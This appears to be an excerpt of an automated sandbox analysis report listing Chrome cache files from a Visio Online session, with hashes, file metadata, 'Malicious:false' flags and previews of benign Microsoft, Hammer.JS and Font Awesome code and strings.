                                                        SHA-256:883922A710E857E94B35FD6748792782280A859E154E4DB2E4C0B4876DFA61AE
                                                        SHA-512:35DDE4930521684FC51EB5E521D23259DB9A17455F572CCE8BF3E319BE1D69B0571D6E38AB9C72F5801E8777F567AED9742970E6409C0C77C255E995362B5477
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:/*! Hammer.JS - v2.0.8 - 2019-03-19.. * http://hammerjs.github.io/.. *.. * Copyright (c) Jorik Tangelder;.. * Licensed under the MIT license */..(function(window,document,exportName,undefined){"use strict";function ifUndefined(val1,val2){return val1===undefined?val2:val1}var STATE_POSSIBLE=1;var STATE_BEGAN=2;var STATE_CHANGED=4;var STATE_ENDED=8;var STATE_RECOGNIZED=STATE_ENDED;var STATE_CANCELLED=16;var STATE_FAILED=32;var assign=void 0;if(typeof Object.assign!=="function"){assign=function assign(target){if(target===undefined||target===null){throw new TypeError("Cannot convert undefined or null to object")}var output=Object(target);for(var index=1;index<arguments.length;index++){var source=arguments[index];if(source!==undefined&&source!==null){for(var nextKey in source){if(source.hasOwnProperty(nextKey)){output[nextKey]=source[nextKey]}}}}return output}}else{assign=Object.assign}var assign$1=assign;var _uniqueId=1;function uniqueId(){return _uniqueId++}function each(obj,iterator,con

                                                        Chrome Cache Entry: 375

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (64817)
                                                        Category:dropped
                                                        Size (bytes):735155
                                                        Entropy (8bit):5.273108399403173
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:FAFE434E479A50E4537A6147951576C7
                                                        SHA1:FC6331A0F896CA2A45134C683FE13A5A785AED2C
                                                        SHA-256:7C03B902BEB2B71F61498C980B12CDBF2C82B4F2216386FA557323B607D41BA4
                                                        SHA-512:673B2BED89C4DC1B222B9505FB200E6E177096D57C66AEAE72AC0FE5668B8D6F0287660AB067804917E61D88AD8CE93E5739A09149EDD3FA73F73CE759CD3D66
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:/* Office runtime JavaScript library */../*..Copyright (c) Microsoft Corporation. All rights reserved..*/.../*. Your use of this file is governed by the Microsoft Services Agreement http://go.microsoft.com/fwlink/?LinkId=266419... This file also contains the following Promise implementation (with a few small modifications):. * @overview es6-promise - a tiny implementation of Promises/A+.. * @copyright Copyright (c) 2014 Yehuda Katz, Tom Dale, Stefan Penner and contributors (Conversion to ES6 API by Jake Archibald). * @license Licensed under MIT license. * See https://raw.githubusercontent.com/jakearchibald/es6-promise/master/LICENSE. * @version 2.3.0.*/.var __extends=this&&this.__extends||function(){var e=function(t,n){return e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},e(t,n)};return function(t,n){if("fu

                                                        Chrome Cache Entry: 376

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (6724)
                                                        Category:dropped
                                                        Size (bytes):6774
                                                        Entropy (8bit):5.298069596281463
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B7E3E6473ACC9262D6FC4510917E8ECF
                                                        SHA1:F06817EE1D0818F9BF02F7C854A6D2624086724C
                                                        SHA-256:9A2A248185E0BD88CAA69C47A30CEB371A56200C84EDE7692AD94D629DFD38C0
                                                        SHA-512:391A8E7E1355BBA5830FCEEC1CDF0E47F2BB30779BDA047DCB29DD2103003AA13C740219171394C1286D2E2DB6E9F26A24E5F45EC0B3C397A6A71BC971A9C856
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:var appResourceLoader;!function(){"use strict";var e,n,t,r,o={98059:function(e,n,t){n.iP=n.oL=n.Ts=void 0;const r=t(46988);let o,i,u=!1;n.Ts=function(e,n,r){o=e,i=r,t.p=n,u=!0},n.oL=function(e,n){const t=o(e,n);return(0,r.loadScript)(e,t,"anonymous",5)};const a=new Map;n.iP=function(e,n){return function t(r){if(!u)throw new Error("appResourceLoader not initialized");if(a.has(r))return a.get(r);const o=Date.now();let c=-1;const s=[];if(e[r]&&e[r].dependencies)for(const n of e[r].dependencies)s.push(t(n));let d;return d=0===s.length?n(r):Promise.all(s).then((()=>(c=Date.now()-o,n(r)))),d=d.then((e=>{if(i){let e=`Chunk ${r} loaded in ${Date.now()-o} ms`;-1!==c&&(e+=` (${c} ms for extra ${s.length} deps)`),i(512235483,306,50,e)}return e})).catch((e=>{throw i&&i(512235482,306,10,e),e})),a.set(r,d),d}}},46988:function(e,n){function t(e,n,r,o,i,u,a){return new Promise(((c,s)=>{const d=document.createElement("script");d.async=!1,d.src=n,void 0!==r&&(d.crossOrigin=r),i&&""!==i&&(d.setAttribute(

                                                        Chrome Cache Entry: 377

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (52276)
                                                        Category:downloaded
                                                        Size (bytes):102526
                                                        Entropy (8bit):4.781903903660331
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:C43CD173EEEBA2F72AA6B431D06B8C07
                                                        SHA1:427A692F7F39EABB3D5B8510AEE2743025DAF813
                                                        SHA-256:C880EB3D25C765D399840AA204FEC22B3230310991089F14781F09A35ED80B8A
                                                        SHA-512:02F6F6422B83104BC1E1B64961D7EDDA63635528417ED2DD3C6F0527457B8AB4CB43C528D2A70FC61E0F96AEC6E6D1A6D2B53ED523E1568B6D78BA41111C1393
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                        Preview:/*!. * Font Awesome Free 6.5.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2023 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-

                                                        Chrome Cache Entry: 380

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):72
                                                        Entropy (8bit):4.241202481433726
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9E576E34B18E986347909C29AE6A82C6
                                                        SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                        SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                        SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"Message":"The requested resource does not support http method 'GET'."}

                                                        Chrome Cache Entry: 381

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):347
                                                        Entropy (8bit):5.409251215921619
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:E824C125BB62196A2BBC7F72AC1BF50B
                                                        SHA1:5A8E7977F53232D2330E93D2CA1FC33E0C3C77AE
                                                        SHA-256:812B57E46B55A2A809DCEE4E87E08178112836DC8288730AAA23DF90F95D4288
                                                        SHA-512:51103F55605A9D21FAE0C67778CD20AB3ECD57F930A3DA6F883AC336D07A9993657CFE1C53FA1F2AFA294574A559BCC9665A857621FBB1214E7973B634F354CB
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://ecs.office.com/config/v1/OneShell/1.0.0.0?agents=OneShell&IsConsumer=true&WorkloadId=VisioOnline&TenantId=84df9e7f-e9f6-40af-b435-aaaaaaaaaaaa&UserId=null&UPN=null
                                                        Preview:{"OneShell":{"UpdatedConsumerAppList":true,"M365StartEnabled":true,"DisableM365StartIntentsModule":false,"default":true},"Headers":{"ETag":"\"8M6C3IBLtb8mwT1KNreplkZ/i0rFbbeiyWPkxzwWrg0=\"","Expires":"Thu, 31 Oct 2024 11:12:07 GMT","CountryCode":"US","StatusCode":"200"},"ConfigIDs":{"OneShell":"P-R-1157040-4-8,P-R-1131228-4-17,P-D-1117449-1-4"}}

                                                        Chrome Cache Entry: 382

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):210219
                                                        Entropy (8bit):5.519881063016727
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:83C2A496B8E8B2F7A2162B4B96AC8481
                                                        SHA1:2512391A4E3864367DDF857AD2B266E05497C061
                                                        SHA-256:CD97B1411F3D5DAD39A899CEE87B0554166E6D8D443A0259EBD9E4714CD110FF
                                                        SHA-512:8761D97BCB1AA6C74FAC088B67B05634840BA923D7427F792DC8166F0D45E6531784907609AFC149382C189E2E048CBC085F74234F569CF1CE568ED9FB8A55D4
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://wise.public.cdn.office.net/wise/owl/owl.5713dd8afbcd714f28fb.js
                                                        Preview:var Microsoft;!function(){"use strict";var t,e,n,o,r={32812:function(t,e,n){n.d(e,{h:function(){return s}});var o=n(13260),r=n(40426),i=n(19665),s=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.value=null,e.hasNext=!1,e.hasCompleted=!1,e}return o.C6(e,t),e.prototype.N=function(e){return this.hasError?(e.error(this.thrownError),i.y.EMPTY):this.hasCompleted&&this.hasNext?(e.next(this.value),e.complete(),i.y.EMPTY):t.prototype.N.call(this,e)},e.prototype.next=function(t){this.hasCompleted||(this.value=t,this.hasNext=!0)},e.prototype.error=function(e){this.hasCompleted||t.prototype.error.call(this,e)},e.prototype.complete=function(){this.hasCompleted=!0,this.hasNext&&t.prototype.next.call(this,this.value),t.prototype.complete.call(this)},e}(r.B7)},39188:function(t,e,n){n.d(e,{t:function(){return s}});var o=n(13260),r=n(40426),i=n(92581),s=function(t){function e(e){var n=t.call(this)||this;return n.B=e,n}return o.C6(e,t),Object.defineProperty(e.prototype,"va

                                                        Chrome Cache Entry: 387

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):11
                                                        Entropy (8bit):3.2776134368191165
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:825644F747BAAB2C00E420DBBC39E4B3
                                                        SHA1:10588307553E766AB3C7D328D948DC6754893CEF
                                                        SHA-256:7C41B898C5DA0CFA4AA049B65EF50248BCE9A72D24BEF4C723786431921B75AA
                                                        SHA-512:BFE6E8DF36C78CBFD17BA9270C86860EE9B051B82594FB8F34A0ADF6A14E1596D2A9DCDC7EB6857101E1502AFF6FF515A36E8BA6C80DA327BC11831624A5DAEA
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:Bad Request

                                                        Chrome Cache Entry: 390

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):1080070
                                                        Entropy (8bit):5.4049023155506095
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:1EFB51287B347E6FCC95C9CF661A8789
                                                        SHA1:3056913C07F96F314E4812DC31F23CEE0663D6D8
                                                        SHA-256:AAE29165A1C89363EA13D8836522D8BE49B5E4E1A2221161159ABA9CBE7BCC01
                                                        SHA-512:DBF0901C7D9220431F58AF0433FD5739CCE1767096E50B0ADE932D2CA5EB6B3455BCEF58093AB4CF7412D63F4A32096C4F73E92A6B6A82155A15DB7FAC900C1B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/hAAE29165A1C89363_App_Scripts/es2020/common50.min.js
                                                        Preview:(globalThis.visioOnlineChunks=globalThis.visioOnlineChunks||[]).push([[243],{44289:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.readPropertyInfo=void 0,t.readPropertyInfo=function(e){return Array.isArray(e)&&2===e.length&&"opt-field"===e[0]?[!0,e[1]]:[!1,e]}},64934:function(e,t,o){"use strict";function n(e,t){for(var o=0;o<t.length;o++){var n=t[o];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}Object.defineProperty(t,"__esModule",{value:!0}),t.CustomTypeRegistry=void 0;const r=o(74474);let i=function(){return e=function e(){!function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,e),this.typeInfos={},this.typeInfosCache=[],this.externalTypes={}},(t=[{key:"constuctor",value:function(e=!1){this.throwOnError=e}},{key:"registerTypeInfos",value:function(e){if(-1===this.typeInfosCache.indexOf(e)){this.typeInfosCache.push(e);for(const t of Object.keys(e)){

                                                        Chrome Cache Entry: 391

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 24x24, 32 bits/pixel
                                                        Category:dropped
                                                        Size (bytes):7886
                                                        Entropy (8bit):3.9249407003625794
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9A656DFE96ABBD59C997150093A3821D
                                                        SHA1:C4FCBADAFB3ABA496F9B0008FB4B6131471B2C58
                                                        SHA-256:F6D0ABA1461F33582EEC2EE9E85492E68C8FDA9CC88075B7923A72E173FD411A
                                                        SHA-512:A349C86C74A50BC4A2893F210F2CD35F907D4070FBF9B4FF7BD484C7C658C2FB1F68C8AE5806E383D8FB2C55EED1C12E24D6AF01B7890B4FB541B26160FAB4C2
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:...... .... .....6......... ............... .h...f...(... ...@..... ......................................................................................................................................................................................................................................................................................................................................?...?...?..?...?...?...?..?...?...........................................................................................?.P.?..?...?...?...?...?...?...?...?..?.P.................................................................................?.P.?...?...?...?...?...?...?...?...?...?...?...?.P........................................................................t2..t2..t2..t2..t2..t2..t2..t2..y4...?...?...?...?...?..?......................................................................h...h...h...h...h...h...h...h...h....:...?...?...?...?...?................................................

                                                        Chrome Cache Entry: 392

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):109
                                                        Entropy (8bit):4.66560738606782
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B22CAC36842DCB642F5BFF86C0FF2FB9
                                                        SHA1:7F0557D5258453F55C1DB5DD40AB7F1C31932655
                                                        SHA-256:E25ABD11267B28557444D53A9A3BF52A796DF20A14205FDE0B19C6B8287976B3
                                                        SHA-512:D991A7C2B5552EF795F01450BEB8FE91785FAB87DD53361AD4048972BADB46180966120B0EF42B647654DE6CB8E8DF6D13EFDC2C170CB498FD8DBAC63629ADAC
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"CampaignContent":{"campaigns":[]},"DynamicSettings":{"TmsLoadTimeout":3000,"TeachingMessageCooldown":3600}}

                                                        Chrome Cache Entry: 394

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (26125)
                                                        Category:downloaded
                                                        Size (bytes):381224
                                                        Entropy (8bit):4.767496031249598
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:05216D2CC2C947700C60BDE315E7801E
                                                        SHA1:C7D4DF3741B3ED1B0AE40B8DB9421C46C83E9841
                                                        SHA-256:ED3D650B5B1C721D161DF8199BC87F5909A4B9FFF2B4F080A9F405E30D024970
                                                        SHA-512:83F65C7938A3481103EC362ED968FFB502E4E9CF6E030961488C29788CE0F9DE2EAC51091DFD331D79C2C6131901C75D09CE554500944677D52940F6A0E90E8C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/hED3D650B5B1C721D_App_Scripts/1033/visio-app-intl.min.js
                                                        Preview:var VisioRibbonStrings={About:"About",Accessibility:"Accessibility",AddConnector:"Connector",AddConnector_ToolTip:"Draw connector (Alt+3)",AddConnectorMac_ToolTip:"Draw connector (.+3)",AddInsKeytipPrefix:"Y",AddLayerLabel:"Add Layer",Align:"Align",AlignAndPosition:"Align and Position",AlignBottom:"Align Bottom",AlignCenter:"Align Center",AlignLeft:"Align Left",Alignment:"Alignment",AlignMiddle:"Align Middle",AlignRight:"Align Right",AlignShapes:"Align Shapes",AlignTextBottom:"Align Text Bottom",AlignTextLeft:"Align Text Left",AlignTextMiddle:"Align Text Middle",AlignTextRight:"Align Text Right",AlignTextTitle:"Align Text",AlignTextTop:"Align Text Top",AlignTop:"Align Top",AltText:"Alt-Text",ArrangeShapes:"Arrange Shapes",AssignToLayer:"Assign To Layer",Black:"Black",BlankDrawing:"Blank drawing",Blue:"Blue",BlueGray:"Blue Gray",Bold:"Bold",BringForward:"Bring Forward",BringForward_Callout:"Forward",BringToFront:"Bring to Front",BubbleTheme:"Bubble",Cancel:"Cancel",CatchUpActivity:"Ca

                                                        Chrome Cache Entry: 395

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65443)
                                                        Category:dropped
                                                        Size (bytes):734469
                                                        Entropy (8bit):5.519143735413564
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9F5073B64B56A4C8D0B1B596C3D05FFD
                                                        SHA1:CAFAD76BE15AC0B9E3B48AF173D2EFE02B5C416F
                                                        SHA-256:8B6BA39147DC3BA407A6D00A31C665194A425D95BC3F8F6284C52A2008E73C5E
                                                        SHA-512:B488EBB48BEEBBDE0BEBDCD652C3B9057C1008D067308B68179BF1C6C4C122021A044FB0D9177E0BC8FB9BE4E715C7205A2084017BB6F3A6D423860C34A920A3
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:/*! For license information please see officebrowserfeedback_floodgate.min.js.LICENSE.txt */.!function(e){var t={};function A(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,A),r.l=!0,r.exports}A.m=e,A.c=t,A.d=function(e,t,n){A.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},A.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},A.t=function(e,t){if(1&t&&(e=A(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(A.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)A.d(n,r,function(t){return e[t]}.bind(null,r));return n},A.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return A.d(t,"a",t),t},A.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},A.p="",A(A.s=

                                                        Chrome Cache Entry: 396

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (6042), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):6042
                                                        Entropy (8bit):5.018454487556217
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:A55176635E66B80522E25E4CCCA05A90
                                                        SHA1:48AA2527313440869A4CE79E0C0D2329903C4C08
                                                        SHA-256:CBA89239522795D55FCF43087637399562C8FB25CF3BAADF59F488BB97BFFD6D
                                                        SHA-512:F82703D63B252D92B346AE73555F8D7A28AB390B0BF54B91CAE8B3E634EFF9EDAAA583C44E5EF30A52C4EBEB03FD7A1F79308D17027A2F315284D83AF68C9DCD
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/hCBA89239522795D5_App_Scripts/Compat.js
                                                        Preview:function __loadCompat(n){n.Debug=function(){};n.Debug._fail=function(n){throw new Error(n);};n.Debug.writeln=function(n){window.console&&window.console.debug(n)};n.__getNonTextNode=function(n){try{while(n&&n.nodeType!=1)n=n.parentNode}catch(t){n=null}return n}}function _loadSafariCompat(){Node.prototype.__defineGetter__("text",function(){return this.textContent});Node.prototype.__defineSetter__("text",function(n){this.textContent=n});Node.prototype.selectNodes=function(n){var t=this.ownerDocument;return selectNodes(t,n,this)};Node.prototype.selectSingleNode=function(n){var t=this.ownerDocument;return selectSingleNode(t,n,this)};Document.prototype.selectNodes=function(n){return selectNodes(this,n,this.documentElement)};Document.prototype.selectSingleNode=function(n){return selectSingleNode(this,n,this.documentElement)}}function _loadMozillaCompat(n){n.navigate=function(n){window.setTimeout('window.location = "'+n+'";',0)};var t=function(n,t){t._mozillaEventHandler=function(n){return win

                                                        Chrome Cache Entry: 398

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (2224), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):2224
                                                        Entropy (8bit):5.029670917384203
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:96EC242EA2E25558F7EC13FA88D9D793
                                                        SHA1:B0BB7F6BD5206CC1FFB572CBD4A6AD2F88D42433
                                                        SHA-256:850C54CE960E710757379C19601C65C00CF7D485063115F34AA30AE193CCEA43
                                                        SHA-512:8C732012F96C7A9B4434F1BC27262A07080F05FCDF54E64B9CB4F37C20D3D8A85FAC2387C934798056D137B03F918D5CE4847C835CC013EDD4485686993D5F4F
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/161821440601_App_Scripts/Feedback/latest/Intl/en/officebrowserfeedbackstrings.js
                                                        Preview:OfficeBrowserFeedback.setUiStrings({FeedbackSubtitle:"Send Feedback to Microsoft",PrivacyStatement:"Privacy Statement",Form:{CommentPlaceholder:"Please do not include any confidential or personal information in your comment",CategoryPlaceholder:"Select a category (optional)",EmailPlaceholder:"Email (optional)",RatingLabel:"Rating",ScreenshotLabel:"Include screenshot",Submit:"Submit",Cancel:"Cancel",EmailCheckBoxLabel:"You can contact me about this feedback",PrivacyConsent:"IT admins for your organization will be able to view and manage your feedback data.",PrivacyLabel:"By pressing submit, your feedback will be used to improve Microsoft products and services. ",ScreenshotImgAltText:"Screenshot Preview"},SingleForm:{Title:"Please provide feedback"},SmileForm:{Anchor:"I like something",Title:"What did you like?"},FrownForm:{Anchor:"I don't like something",Title:"What did you not like?"},IdeaForm:{Anchor:"I have a suggestion",Title:"What do you suggest?"},BugForm:{Anchor:"File a bug",Titl

                                                        Chrome Cache Entry: 401

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):17147
                                                        Entropy (8bit):4.926675206527061
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:8D75B8E85D749610931E168F2EFCF555
                                                        SHA1:11410945A27700DBE941C030189C637792AAC2CE
                                                        SHA-256:485A60AD5AF1CEFF60C50A9BFB08A03F0C42B984034A2255820356938B82B2A0
                                                        SHA-512:EA2196C089F4F10ABB20FBDB41E097C67211734F1C1919595E163CB5D90EAD00DF8D44629ADF854F84C666B2C0D8916DDDDA2F6555F495FDCEAE1BAB5419ECA0
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/161821440601_App_Scripts/suiteux-shell/strings/en/shellstrings.json
                                                        Preview:{. "Microsoft": "Microsoft",. "FlexpaneCloseButton": "Close pane",. "Me_Header": "My account",. "MePhotoAriaLabel": "{0} {1} Current account's user photo",. "ChangePhotoAriaLabel": "{0} {1} Change the photo that appears in IM. This may open a new window.",. "MePhotoTitle": "Current account's user photo",. "ChangePhotoTitle": "Change the photo that appears in IM. This may open a new window.",. "AppLauncherAriaLabel": "App launcher opened",. "AppLauncherCloseAriaLabel": "Close the app launcher",. "AppLauncherHomeAriaLabel": "Microsoft 365, will be open in new tab",. "AppsModuleHeading": "Apps",. "Microsoft365": "Microsoft 365",. "AppsModuleAllApps": "All apps",. "AppsModuleAllAppsTooltip": "Open all apps",. "AllViewGroupShowMore": "Show More",. "AllViewGroupShowLess": "Show Less",. "AllViewBack": "Back",. "AllViewNewGroupHeading": "New",. "AllViewAdminSelectedGroupHeading": "Admin selected apps",. "AllViewMoreFirstPartyGroupHeading": "More from Microsoft",. "AllViewT

                                                        Chrome Cache Entry: 402

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (56385)
                                                        Category:downloaded
                                                        Size (bytes):203723
                                                        Entropy (8bit):5.091010803843199
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:BC553108CB200A9A9036DD8FC379767F
                                                        SHA1:F5C8EA36367061664B738BC1C46C8192E3C8B97A
                                                        SHA-256:A8A93A5AD7BFEBE0381A319F2681457CB386F9B645C594FB443640677F5857B5
                                                        SHA-512:7FDF388E327C20B2227C63B7F73A0D09A956B5A94895E730AFC7139EE8CDFD165DF13C300B6C2FE76C439420A022446E55DC459C41349E1EBBCFDA7023D99422
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/hA8A93A5AD7BFEBE0_App_Scripts/Consumption/1033/common-intl.min.js
                                                        Preview:var CommonStrings={qpsPloc_Name:"Pseudo",qpsPloca_Name:"Pseudo (Pseudo Asia)",qpsPlocm_Name:"Pseudo (Pseudo Mirrored)",afrikaans:"Afrikaans",albanian:"Albanian",alsatian:"Alsatian",amharic:"Amharic",arabic:"Arabic",arabic_Algeria:"Arabic (Algeria)",arabic_Bahrain:"Arabic (Bahrain)",arabic_Egypt:"Arabic (Egypt)",arabic_Iraq:"Arabic (Iraq)",arabic_Jordan:"Arabic (Jordan)",arabic_Kuwait:"Arabic (Kuwait)",arabic_Lebanon:"Arabic (Lebanon)",arabic_Libya:"Arabic (Libya)",arabic_Morocco:"Arabic (Morocco)",arabic_Oman:"Arabic (Oman)",arabic_Qatar:"Arabic (Qatar)",arabic_Saudi_Arabia:"Arabic (Saudi Arabia)",arabic_Syria:"Arabic (Syria)",arabic_Tunisia:"Arabic (Tunisia)",arabic_UAE:"Arabic (U.A.E.)",arabic_Yemen:"Arabic (Yemen)",armenian:"Armenian",assamese:"Assamese",azerbaijani:"Azerbaijani",azerbaijani_Cyrillic:"Azerbaijani (Cyrillic)",azerbaijani_Latin:"Azerbaijani (Latin)",bangla_Bangladesh:"Bangla (Bangladesh)",bangla_India:"Bangla (India)",bashkir:"Bashkir",basque:"Basque",belarusian:"Bela

                                                        Chrome Cache Entry: 403

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):175719
                                                        Entropy (8bit):4.255303968193695
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9CFEFB2D46D6102DAC2A24C606F47FEA
                                                        SHA1:076B63F4F46CE28648201E2507BBC67FB4F990C5
                                                        SHA-256:43C5939CB732D8AA2D20FCE97F359F46B7C3B937E60ED576B752AE0A2E73314F
                                                        SHA-512:C56812F0A9DCBC53E8AFA542923F20E911DE172C1D87B9868DB42A01F2FC303BBECE6509925E43E8F877DC8A3C7904FAE731C1C19BD35B5FAD18582B7498E24D
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:var __extends = (this && this.__extends) || (function () {.. var extendStatics = function (d, b) {.. extendStatics = Object.setPrototypeOf ||.. ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) ||.. function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; };.. return extendStatics(d, b);.. };.. return function (d, b) {.. extendStatics(d, b);.. function __() { this.constructor = d; }.. d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());.. };..})();..var OfficeExtension;..(function (OfficeExtension) {.. var WacRuntime;.. (function (WacRuntime) {.. var ApiFlags;.. (function (ApiFlags) {.. ApiFlags[ApiFlags["none"] = 0] = "none";.. ApiFlags[ApiFlags["restrictedResource"] = 4] = "restrictedResource";.. ApiFlags[ApiFlags["makerSafe"] = 128] = "makerSafe";.. ApiFlags[ApiFlags["excludedF

                                                        Chrome Cache Entry: 404

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (6415), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):6415
                                                        Entropy (8bit):5.362281129384873
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F71D30320C37D389C0572889A9444385
                                                        SHA1:E5F66C43385DD35CD68FA1758607E75B4870BBB6
                                                        SHA-256:A064E449C647098445934363B048DE9E57DB155D6826DB491DB74741384897C9
